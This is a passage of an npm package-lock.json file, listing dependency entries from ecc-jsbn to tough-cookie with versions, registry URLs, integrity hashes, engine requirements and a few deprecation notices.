"sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": 
"*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": 
"^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": 
"sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": 
"https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": 
"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." 
}, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", 
"set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": 
"https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": 
"sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": 
"https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", 
"assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", 
